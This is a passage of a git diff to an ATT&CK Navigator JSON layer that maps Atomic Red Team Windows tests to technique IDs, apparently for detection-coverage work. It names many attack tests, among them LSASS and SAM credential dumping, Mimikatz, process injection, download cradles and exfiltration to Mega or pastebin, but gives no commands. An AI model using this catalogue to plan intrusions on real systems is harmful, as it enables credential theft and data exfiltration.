Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search 
Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator 
Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM 
Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with 
ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl 
windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via 
Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic 
script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View 
